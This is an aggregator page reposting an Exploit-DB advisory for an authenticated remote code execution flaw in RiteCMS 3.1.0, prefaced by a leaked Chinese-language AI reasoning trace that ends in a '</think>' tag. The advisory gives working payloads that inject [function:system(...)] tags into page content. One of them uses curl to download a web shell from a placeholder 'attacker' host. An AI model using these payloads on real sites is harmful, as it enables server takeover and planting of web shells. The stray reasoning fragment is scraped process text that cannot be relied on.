[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我得仔细阅读文章内容,找出关键点。 文章标题是RiteCMS 3.1.0的认证远程代码执行漏洞。作者是Chokri Hammedi,发布日期是2025年10月26日。漏洞描述中提到content_function()处理函数存在漏洞,允许有编辑权限的用户执行任意PHP代码。 步骤部分显示攻击者可以通过在页面内容中插入特定标签来执行系统命令,比如system('whoami')。这说明漏洞利用起来相对简单,影响较大。 总结时需要包括软件名称、版本、漏洞类型、触发方式以及影响范围。控制在100字以内,所以要简洁明了。 可能的表达方式:“RiteCMS 3.1.0存在认证远程代码执行漏洞,攻击者可通过编辑页面内容中的[function:...]标签注入并执行任意PHP代码,可能导致服务器被控制。” 这样既涵盖了关键点,又符合字数限制。 </think> RiteCMS 3.1.0 存在认证远程代码执行漏洞,攻击者可通过编辑页面内容中的[function:...]标签注入并执行任意PHP代码,可能导致服务器被控制。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏

# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution 
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link:
https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP


## Vulnerability Description
RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
its content_function() handler: [function:...] tags in page content are
evaluated, allowing a user with page-editing privileges to execute
arbitrary PHP on the server.

## Exploit Code
Create or edit any page with the following content:

[function:system('whoami')]


## Steps to Reproduce
1. Login as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed

## additional payloads
[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]
            

文章来源: https://www.exploit-db.com/exploits/52488
如有侵权请联系:admin#unsafe.sh